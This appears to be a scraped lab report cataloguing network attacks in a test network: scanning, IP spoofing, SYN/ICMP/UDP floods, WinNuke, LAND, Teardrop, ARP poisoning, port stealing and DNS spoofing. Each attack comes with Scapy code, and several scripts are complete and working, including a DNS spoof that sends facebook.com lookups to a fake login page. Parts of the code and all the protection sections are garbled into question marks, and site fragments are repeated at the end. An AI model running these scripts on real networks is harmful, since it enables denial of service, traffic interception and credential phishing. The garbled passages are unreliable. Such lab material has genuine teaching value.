Attacks-SEt of Attacks

Various Network attacks
Various Network Attacks

Content
1. Network overview .............................................................................................................................. 3
2. Network attacks ................................................................................................................................. 4
2.a. IP address sweeping ............................................................................................................................... 4
2.b. Port scanning .......................................................................................................................................... 5
2.c. IP options ................................................................................................................................................ 6
2.c.I. Internet timestamp ........................................................................................................................... 6
2.c.II. loose source routing ......................................................................................................................... 7
2.c.III. stream ID ......................................................................................................................................... 8
2.d. IP spoofing ............................................................................................................................................ 11
2.e. FIN and SYN flags .................................................................................................................................. 12
2.f. Only FIN flag .......................................................................................................................................... 13
2.g. URG flag (WinNuke) .............................................................................................................................. 15
2.h. No flags ................................................................................................................................................. 17
2.i. SYN-flood ............................................................................................................................................... 19
2.j. ICMP flood ............................................................................................................................................. 21
2.k. DROP communications ......................................................................................................................... 23
2.l. ICMP Message redirect .......................................................................................................................... 25
2.m. UDP message flood.............................................................................................................................. 27
2.n. LAND attack .......................................................................................................................................... 29
2.o. TEARDROP attack ................................................................................................................................. 30
2.p. PING of Death ....................................................................................................................................... 31
2.q. SMURF .................................................................................................................................................. 32
2.r. ARP poisoning ....................................................................................................................................... 34
2.s. MAC flooding ........................................................................................................................................ 37
2.t. DNS spoof .............................................................................................................................................. 39
1. Network overview
Network topology:
Notes
-
IP addressing: static
Intra-AS dynamic routing protocol: RIP
Internet access: through NAT service set up on R1
DNS forwarding: R1 forwards DNS queries to ISP DNS server
Host 192.168.52.124 runs Windows 95 or Backtrack according to the attack
2. Network attacks
2.a. IP address sweeping
Attacker: 192.168.50.252
Victims: the whole network
GOAL: Understand which hosts are active in the network
How? Send ICMP echo requests to all possible IPs and check who
replies
Scapy code executed by the attacker:
# builds an ICMP echo request to all possible active hosts in known
network segments
# sends ICMP echo requests and waits for replies (discards host
unreachable replies from routers)
# prints the IP addresses of active hosts
Results:
The attacker discovers active hosts
Wireshark filter: icmp.type == 0
Proposed protection methods:

-
?????????????????????????????????
2.b. Port scanning

Attacker: 192.168.50.252
Victim: 192.168.51.254 (Ubuntu Server)
GOAL: Understand which TCP ports are active on the victim
How? Send TCP SYN to all possible destination ports and see for
which of them the victim replies with a SYN-ACK
target = "192.168.51.254" # victim
# builds a TCP SYN packet with destination port in (1, 65535) range
??????????????????????????????
# sends SYN packets and waits for SYN-ACK replies
?????????????????????????????????
# prints victim's active ports (reports service name instead of
port number if the port corresponds to a well-known service)
?????????????????????????????????????????
Results:
The attacker discovers victims active TCP ports (ftp: 21, ssh: 22, http: 80)
Wireshark filter: tcp.flags.syn==1 and tcp.flags.ack==1

-
?????????????????????????????????????????????????????????
2.c. IP options
Attacker: 192.168.52.124 (with Backtrack)
Victim: 192.168.50.253
Other host involved: 192.168.52.253
GOAL: perform various types of attack using the IP options
field in the IP datagram
How? Send a packet with the proper IP option set
2.c.I.Internet timestamp
This option provides a means for recording the time at which each system processed the sent datagram.
The timestamp option has a number of security implications:
-
It may be used to map the network topology

It may be used to fingerprint the operating system in use by a system processing the datagram.
It may be used to fingerprint physical devices, by analysing the clock skew

target = "192.168.50.253" # victim
# IP option:
# -type: 68 (\x44) internet timestamp
# -length: 12 (\x0c) bytes
# -pointer: 5 (\x05), to the octet beginning the space for next
timestamp
# -overflow: 0 (\x0), number of IP modules that cannot register
timestamps due to lack of space
# -flag: 3 (\x3), an IP module only registers its timestamp if it
matches its own address with the next specified internet address
# -Timestamps: 192.168.50.253(Ubuntu, victim)(\xc0\xa8\x32\xfd) - 0
(to be filled, by the victim) (\x00\x00\x00\x00)
ip=????????????????????????????????
send(ip)
Results:
We send to the victim an ICMP echo request with timestamp option properly set, getting back a timestamp
2.c.II. Loose source routing
This option lets the originating system specify a number of intermediate systems a packet must pass
through to get to the destination host. The receiving host (end-system) must use the reverse of the path
contained in the received LSRR option. Source-routing is used to let the attacker see responses during a
spoofing attack. If an attacker is launching an attack against system V from system H, he can spoof all his
traffic to look as though it came from system S, by manufacturing each packet with source=S, destination=V
and a source-route that makes it look like it has passed through H on its way. For lots of protocols, V is
supposed to use the reverse of the source-route for all its responses, so H can see the responses on the
way back.

spoofedip = "192.168.52.253" # real spoofed ip: Fedora1 (fake source)
# IP option:
# -type: 131 (\x83) loose source routing
# -length: 11 (\x0b) bytes
# -pointer: 4 (\x04), to the first address in source route
# -source route: 192.168.52.129(R2)(dst field)->192.168.52.124(Bck1,
attacker)(\xc0\xa8\x34\x7c)->192.168.51.254(Ubu Srv,
victim)(\xc0\xa8\x33\xfe)
send(ip=IP(src=spoofedip, dst="192.168.52.129",
options=IPOption('\x83\x0b\x04\xc0\xa8\x34\x7c\xc0\xa8\x33\xfe'))
/ICMP())
Note: the attacker has to enable IP forwarding

Results:
We send an ICMP echo request to the victim, specifying a source route that pass through our machine; as a
result we can see the replies sent to the spoofed IP
2.c.III. Stream ID
The Stream Identifier option originally provided a means for the 16-bit SATNET stream Identifier to be
carried through networks that did not support the stream concept. This option is obsolete and it is ignored
by modern systems.
target = "192.168.50.253" # victim
# IP option:
# -type: 136 (\x88) stream ID
# -length: 4 (\x04) bytes
# -stream ID: 257 (\x01\x01)
ip=IP???????????????????????????????????????????
send(ip)
Results:
We send to the victim an ICMP echo request with stream ID option set
But this option is ignored
This IP option is not useful to perform network attacks.

-
??????????????????????????????????????????????????????????????????????
10
2.d. IP spoofing
Attacker: 192.168.50.252
Victim: 192.168.52.126
Spoofed IP: 192.168.50.254
GOAL: Interact with victim anonymously, hiding the real IP
address behind another one (fake or real)
How? In our example, we send TCP SYN to victim, built up with a
fake IP address source
target = "192.168.52.126" # victim
spoofedip = "192.168.50.254" # another active host: Win7
# builds a TCP SYN packet with destination port 139
syn = IP(src=spoofedip, dst=target)/TCP(dport=139, flags="S")
# the source is spoofed, so replies will be sent to the spoofed
address instead of the victim's one
send(syn) # sends the SYN packet
Results:
The victim replies to the spoofed IP address instead of the real source, but receives a RST
The spoofed address receives a SYN-ACK without having sent a SYN request
Note: obviously the attacker cant see the replies (sent to another station or to a fake address)
-
???????????????????????????????????????????????????????????????????????????
11
2.e. FIN and SYN flags

Attacker: 192.168.52.254
Victim1: 192.168.51.254 (Ubuntu Server)
Victim2: 192.168.52.126
GOAL: OS fingerprinting (detect the OS running on the victim
station)
How? send a TCP packet with SYN and FIN flags set (anomalous)
to an open TCP port on the victim host
Note: This code attacks only one host
target = "192.168.51.254" # victim: Ubuntu server
# sends a TCP packet with SYN and FIN flags set to an open TCP port
on the victim host
send(IP(dst=target)/TCP(sport=RandShort(), dport=80, flags="SF"))
# NOTE: use a passive OS fingerprinting tool (like p0f) to analyze
the reply
Results:
The attacker identifies the victims OS analysing the replies
For the analysis we can use a passive OS fingerprinting tool like p0f
In this case, p0f fails to detect Windows XP running on 192.168.52.126, while correctly detect the Linux
system running on 192.168.51.254 (even if with low accuracy )
-
???????????????????????????????????????????????????????????
12
2.f. Only FIN flag

Attacker: 192.168.52.254
Victim2: 192.168.52.126
station)
How? send a TCP packet with only FIN flag set (anomalous) to an
open TCP port on the victim host and check its behaviour
target = "192.168.51.254" # victim
# sends a TCP packet with FIN flag set to an open TCP port on the
victim host
fin = IP(dst=target)/TCP(sport=RandShort(), dport=80, flags="F")
ans = 0
# sends the packet and waits for a possible reply
ans = sr1(fin, retry=2, timeout=3)
# according to the protocol RFC a system shouldn't reply to a FIN
only packet, however some systems reply with a RST; after some tests,
we noticed that windows systems reply with RST, while Linux systems
(correctly) don't reply!
if not ans:
print "No answer from target...probably Linux (UNIX like)"
else:
print "RST received...probably Windows"
Results:
The attacker identifies the victims OS analysing their behaviour
13
Host 192.168.51.254 doesnt reply to our packets: this is the typical (correct according to RFC) behaviour of
Linux OSs; while host 192.168.52.126 replies with a RST-ACK: this is the typical (wrong according to RFC)
behaviour of Windows OSs (refer to the code comments for more details about the correct behaviour
suggested by the RFC)
-
??????????????????????????????????????????????????????
14
2.g. URG flag (WinNuke)

Attacker: 192.168.52.252
Victim: 192.168.52.124 (with windows 95)
GOAL: Crash, lock up or get offline the victim system
How? Send to the victim a packet with URG flag set during a TCP
connection on port 139 (netbios)
#before executing code run this command (Linux): iptables -A OUTPUT
-p tcp -d 192.168.52.124 -s 192.168.52.252 --dport 139 --tcp-flags
RST RST -j DROP, this is needed in order to block RST messages
created by OS
target = "192.168.52.124" # victim
# 3-Way handshake: connection establishment on port 139
ip=IP(src="192.168.52.252", dst=target)
TCP_SYN=TCP(sport=51000, dport=139, flags="S", seq=12345) # SYN
TCP_SYNACK=sr1(ip/TCP_SYN) # sends SYN, waits for SYN-ACK
my_ack = TCP_SYNACK.seq + 1
# ACK
TCP_ACK=TCP(sport=51000, dport=139, flags="A", seq=12346, ack=my_ack)
send(ip/TCP_ACK) #sends ACK
my_payload="Bye"
TCP_PUSH=TCP(sport=51000, dport=139, urgptr=3, flags="UPA",
seq=12346, ack=my_ack) # URG flag set
send(ip/TCP_PUSH/my_payload)
15
Results:
The attacker sends the packet to victim host, causing a BSOD error
The system doesnt crash, but its network functionalities are totally compromised

-
??????????????????????????????????????????????
16
2.h. No flags
Attacker: 192.168.52.254
Victim2: 192.168.52.126
station)
How? send a TCP packet with no flags set (anomalous) to an
open TCP port on the victim host and check its behaviour
target = "192.168.52.126" # victim
# builds a TCP packet with no flag set and an open port on the victim
host as dport
fin = IP(dst=target)/TCP(sport=RandShort(), dport=139, flags="")
ans = 0
# sends the packet and waits for a possible reply
ans = sr1(fin, retry=2, timeout=3)
# according to the protocol RFC a system shouldn't reply to a packet
with no flag set, however some systems reply with a RST; after some
tests, we noticed that windows systems reply with RST, while Linux
systems (correctly) don't reply!
if not ans:
print "No answer from target...probably Linux (UNIX like)"
else:
print "RST received...probably Windows"
Results:
The attacker identifies the victims OS analysing their behaviour
17
Host 192.168.51.254 doesnt reply to our packets: this is the typical (correct according to RFC) behaviour of
Linux OSs; while host 192.168.52.126 replies with a RST-ACK: this is the typical (wrong according to RFC)
behaviour of Windows OSs (refer to the code comments for more details about the correct behaviour
suggested by the RFC)
-
?????????????????????????????????????????????????????
18
2.i. SYN-flood
Attacker: 192.168.50.252
Victim: 192.168.51.254 (Ubuntu Server)
GOAL: Perform a DoS attack against the victim
How? Send a huge number of TCP SYN to an open TCP port on
the victim host using a spoofed IP; for each request, the victim
system responds with a SYN-ACK and waits (until timeout) for an ACK which will never come (SYN-ACK sent
to a fake spoofed IP address); the SYN queue will be soon filled with SYN_RCVD connections, preventing the
establishment of legitimate TCP connection.
target = "192.168.51.254" # victim
while True: # floods the target's port 80 (web server) with TCP SYN
spoofedip = RandIP() # random spoofed source IP
# builds a TCP SYN packet with destination port 80
????????????????????????????????????????????
# the source is spoofed, so replies will be sent to the spoofed
address instead of the attacker's one
send(syn) # sends the SYN packet
Results:
The victim sends SYN-ACK replies to the spoofed IP address, so no corresponding ACKs are received
???????????????????????????????????????????????????????????????????????????????????????
19
The SYN queue is soon filled with SYN_RCVD connections waiting for an ACK (that will never come)
And the web server running behind port 80 on 192.168.51.254 is no longer reachable

-
???????????????????????????????????????????????
20
2.j. ICMP flood

Attacker: 192.168.50.252
Victim: 192.168.52.126
Spoofed IP (alternative version): 192.168.52.125
GOAL: Saturate victims bandwidth
How? Send a huge number of ICMP echo requests to the victim.
We present two versions. In the second one we use a spoofed IP
address as source
Without spoofing
target = "192.168.52.126" # victim
echo = ??????????????????????????????
# flood the victim with a huge number of ICMP echo requests
send(echo, loop=1)
With spoofing
target = "192.168.52.126" # victim
spoofedip = "192.168.52.125" # another active host: XP1
echo = ??????????????????????????????? # spoofed source
# flood the victim with a huge number of ICMP echo requests
send(echo, loop=1)
Results:
In a short period of time, the victim receives a lot of ICMP echo requests and sends replies, quickly
saturating its bandwidth
In the spoofed version, the spoofed IP address receives the echo replies
21
Note: this attack is effective only if the attacker has much more bandwidth than the victim
-
???????????????????????????????????????????????
22
2.k. DROP communications

Attacker: 192.168.50.252
Server: 192.168.51.254, web server (Ubuntu server)
Victim: 192.168.52.124, client (Windows 95)
GOAL: reset a TCP connection between a client (victim) and a
server
How? Send a properly crafted ICMP destination unreachable protocol unreachable (Hard error) message to the server
random.seed()
target = "192.168.52.124" # victim
server = "192.168.51.254" # Ubuntu server (web server)
while True: # continues to reset the connection (in case of retries)
# The attacker doesnt know which port is used client-side so it
has to guess a reasonable range of ports and do some tries;
Windows usually use ports in range (1024, 4999) for outgoing
connections
for i in range(1024, 5000):
# random TCP sequence number
seq = random.randint(1, 4294967295)
# ICMP destination unreachable (protocol unreachable)
packet
icmp= ??????????????????????????????????????????
send(icmp)
23
Results:
The victim is downloading a file from a web server running on 192.168.51.254:80, but the TCP connection is
reset by malicious ICMP destination unreachable messages; the attack succeeds because the TCP protocol
shouldnt ignore Hard error messages like destination unreachable protocol unreachable.

-
????????????????????????????????????????????????????????????????????????
24
2.l. ICMP Message redirect

Victim: 192.168.52.126
GOAL: Force the traffic from the victim to a destination to pass
through the attacker
How? Send to the victim a fake ICMP redirect message
advertising that the best route to a destination pass through the attacker host
target = "192.168.52.126" # victim
gw = "192.168.52.1" # default gateway for 192.168.52.0/25
# We want intercept traffic to this destination:
dest = "192.168.51.1" # router (R1) designed to forward DNS queries.
fakegw = "192.168.52.124" # fake gateway (the attacker)
while True:# ICMP redirect flood
# build and send an ICMP redirect message telling the victim
that fakegw is better than gw to reach dest
redirect = ?????????????????????????????????????????????????
send(redirect)
Results:
We craft ICMP redirect messages using the victims default gateway as spoofed source (redirects are sent
by routers; the victim will consider these messages only if received from his default gateway) and
suggesting the attacker host as better gateway to reach R1, which is the victims default DNS server (R1
forwards DNS queries to ISP name server)
25
The victim writes the new host-route in the routing table
as a result all the DNS traffic coming from the victim passes through the attacker
The attacker doesnt forward the DNS queries creating a black hole that cut the victims access to the
WWW
-
????????????????????????????????????????????????
26
2.m. UDP message flood

Attacker: 192.168.52.252
Victim: 192.168.51.254 (Ubuntu server)
GOAL: Perform a DoS attack against a UDP service
How? Send a huge number of UDP packets, with spoofed source,
to an active UDP port on the victim host
target = "192.168.51.254" # victim (TFTP server)
spoofedip = RandIP() # random spoofed source
random.seed()
while True: # flooding
size = random.randint(64,1024) # random size for UDP packets
# builds UDP packet
udp = ????????????????????????????????????????????????
send(udp)
Results:
The victim receives the malicious packets coming from spoofed IPs
27
and the TFTP server which is running become unreachable

-
????????????????????????????????????????????????????????????????
28
2.n. LAND attack

Attacker: 192.168.50.252
GOAL: lock up the victim
How? Send a TCP SYN packet with source IP = destination IP =
victims IP and destination port = source port = active port on
the victim host
target = "192.168.52.124" # victim
# builds a TCP SYN packet with source IP = destination IP and
destination port = source port = 139 (active on the victim host)
land = ?????????????????????????????????????????????????????
send(land) # sends the packet (just one packet is needed to lock up
Win95!)
Results:
The victim systems replies itself continuously and locks up
-
?????????????????????????????????????????????????????
29
2.o. TEARDROP attack

Attacker: 192.168.52.252
GOAL: Crash the victim system

How? Send to the victim fragmented IP datagrams with
overlapping offset fields, making the victim system unable to reassemble the packets and crashing it
target = "192.168.52.124" # victim
spoofedip = "192.167.2.1" # spoofed source
for i in range(100): # send 100 fragmented messages (usually less are
enough)
# bad len/offset values lead to an overlapping problem causing a
crash
send(IP(id=242, flags="MF", frag=0L, len=56, dst=target,
src=spoofedip)/UDP(sport=12345, dport=139)/("X"*36))
send(IP(id=242, flags=0, frag=3L, len=24, dst=target,
src=spoofedip)/UDP(sport=12345, dport=139)/("X"*28))
Results:
The overlapping issue leads the victim system to a crash
???????????????????????????????????????????????????????
-
?????????????????????????????????????????????????
30
2.p. PING of Death

Attacker: 192.168.52.252
GOAL: Crash the victim system
How? Send to the victim several (usually about 20 are enough)
ICMP echo request with size greater than 65535 bytes (max
allowed)
target = "192.168.52.124" # victim: Win95
# sends a huge number of ICMP echo requests greater than 65535 bytes
(maximum allowed), leading Win95 to a crash
send(fragment(IP(src=RandIP(), dst=?????????????????????, loop=1)
Results:
Generally, sending a 65,536 byte ping packet is illegal according to the IP protocol, but a packet of such a
size can be sent if it is fragmented; when the target computer reassembles the packet, a buffer overflow
can occur, which often causes a system crash.
This attack usually crashes a vulnerable system; however, in our tests, the victim just locks up during the
attack and returns operative if the attack is stopped. In conclusion, we are not able to exactly emulate,
using scapy, the behaviour of the original PING of Death C code (available in Internet).
-
????????????????????????????????????????????????????????????
31
2.q. SMURF
Attacker: 192.168.52.252
Victim: 192.168.52.126
Other involved hosts: subnet 192.168.52.128/25
GOAL: Saturate victims bandwidth
How? Send a huge number of spoofed broadcast ICMP echo
requests using the victims IP address as source
target = "192.168.52.126" # victim
# broadcast address of the subnet (192.168.52.128/25) used to perform
the attack
smurfnet = "192.168.52.255"
# builds a broadcast ICMP echo request
echo = ?????????????????????????????????????
send(echo, loop=1)
Results:
The attacker continuously sends spoofed broadcast ICMP echo requests using the victims IP address as
source; consequently, each host in the attackers subnet sends replies to the victim
32
As a result, the victim is flooded by ICMP echo replies coming from the attackers subnet
Note: the effectiveness of a SMURF attack is based on the number of networks involved and of course on
the size of these networks; many big networks are needed to obtain a good result
??????????????????????????????????????????????????????????????
33
2.r. ARP poisoning

Victim: 192.168.52.126
Other host involved: 192.168.51.254 (Ubuntu server)
GOAL: Let the attacker intercept the traffic between hosts
How? Periodically send properly crafted ARP replies; the aim is
to associate the attacker's MAC address with the IP address of
another host (such as the default gateway)
# function that builds and sends an ARP reply telling the host that
ip is at mac
def arppoison(host, ip, mac):
packet = ARP()
packet.op = 2
packet.hwsrc = mac
packet.psrc = ip
packet.hwdst = 'ff:ff:ff:ff:ff:ff'
packet.pdst = host
send(packet)
sleep_time = 10
target = "192.168.52.126" # victim
gw = "192.168.52.1" # default gateway for 192.168.52.0/25 (R1)
mymac = "08:00:27:d2:21:3e" # attacker's mac address
while True: # continously sends poisoned ARP reply (every 10 seconds)
arppoison(target, gw, mymac) # tells the victim that gw is at
mymac
arppoison(gw, target, mymac) # tells the gw that victim is at
mymac
time.sleep(sleep_time)
Note: the attacker may has to enable IP forwarding (depending on what he wants to do with the
intercepted traffic, see below)
34
Results:
The attacker poisons the victims ARP table and the default gateways ARP table:
-
the router binds the attackers MAC address to the victims IP address
the victim binds the attackers MAC address to the routers IP address
Lets compare the ARP tables before

R1
Attacker
and during the attack

R1
Attacker
All the traffic from the victim to an host outside the subnet (Ubuntu server, running a web server and an ftp
server in our test) will now pass through the attacker
35
So the attacker may simply want to sniff the traffic gathering interesting information (IP forwarding has to
be enabled on the attacker system)
or simply drop the traffic creating a black hole and preventing the victim to communicate with hosts
outside the subnet
-
???????????????????????????????????????????????
36
2.s. MAC flooding

Attacker: 192.168.50.252
Victims: subnet 192.168.50.0/24
Switch involved: R1 (br0)
GOAL: Saturate the CAM table of a switch making it work as a
hub
How? Flood the switch with Ethernet frames containing spoofed
MAC addresses as source; the consequent overflow in the CAM table leads the switch to behave like a
simple hub, broadcasting received traffic to all its ports (so favouring traffic sniffing procedures)
while True: # floods the connected switch with fake MAC addresses
??????????????????????????????????????????????????????????????
Results:
Vyatta doesnt use CAM tables, so this attack is not effective in our environment
Another layer 2 attack is Port stealing
Attacker: 192.168.50.252
Victims: subnet 192.168.50.0/24
Switch involved: R1 (br0)
GOAL: Intercept traffic directed to the victim
How? Flood the switch with Ethernet frames containing the
victims MAC address as source; the switch creates a bad association between the attackers port and the
victims MAC address
target = "08:00:27:99:65:d7" # victim
while True: # floods the connected switch
# creates a bad association between the attacker's port and the
victim's MAC address
sendp(Ether(dst=RandMAC(), src=target))
37
Results:
Even if Vyatta doesnt use CAM tables, the attack works. An association between the attackers port and
the victims MAC address is established and every packet sent to the victim by an host connected to the
switch is forwarded to the attacker; again the attacker can choose to forward the traffic to the victim (IP
forwarding enabled on the attacker system needed) or simply drop it. Here we have some ping replies
intercepted

-
???????????????????????????????????????????????????
38
2.t. DNS spoof

Victim: 192.168.52.126
Router designed to forward DNS requests: R1
GOAL: Redirect the victim to fake web sites or simply DoS
How? After using ARP poisoning on the victim, block and replace
DNS replies coming from a real DNS server with malicious ones,
causing traffic redirection over fake web pages or simply a DoS
def spoof(x): # edits a sniffed DNS query transforming it into a
spoofed DNS response
myserver = "192.168.52.124" # malicious web server on attacker
station running fake facebook login
ip = x.getlayer(IP)
dns = x.getlayer(DNS)
return IP(dst=ip.src,src=ip.dst)/UDP(dport=ip.sport,
sport=ip.dport)/DNS(qr=1, id=dns.id, qd=dns.qd,
an=DNSRR(rrname=dns.qd.qname, ttl=10, rdata=myserver)) # edited
DNS response resolving the name queried to the attacker's IP
while True:
a = sniff(filter="port 53", count=1, promisc=1)
# edit only queries for facebook.com, redirecting the victim to
a fake login page
if not a[0].haslayer(DNS) or a[0].qr or a[0].qd.qname !=
'www.facebook.com.': continue
send(spoof(a[0])) # sends the spoofed response back to the
victim
39
Results:
The victim receives a fake DNS response which resolves the name www.facebook.com to the attackers IP
address
As a result, the victim is redirected to the fake login page running on attackers web server
-
?????????????????????????????????????????????????????
40

Attacks-SEt of Attacks

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Attacks-SEt of Attacks

Uploaded by

Copyright:

Available Formats

Various Network attacks

Various Network Attacks

# prints the IP addresses of active hosts

Proposed protection methods:

2.b. Port scanning

Proposed protection methods:

It may be used to map the network topology

Scapy code executed by the attacker:

2.c.II. Loose source routing

Scapy code executed by the attacker:

Note: the attacker has to enable IP forwarding

But this option is ignored

This IP option is not useful to perform network attacks.

Proposed protection methods:

2.e. FIN and SYN flags

2.f. Only FIN flag

2.g. URG flag (WinNuke)

Proposed protection methods:

Proposed protection methods:

2.j. ICMP flood

2.k. DROP communications

Proposed protection methods:

2.l. ICMP Message redirect

The victim writes the new host-route in the routing table

2.m. UDP message flood

and the TFTP server which is running become unreachable

Proposed protection methods:

2.n. LAND attack

2.o. TEARDROP attack

GOAL: Crash the victim system

2.p. PING of Death

2.r. ARP poisoning

Lets compare the ARP tables before

and during the attack

2.s. MAC flooding

Proposed protection methods:

2.t. DNS spoof

You might also like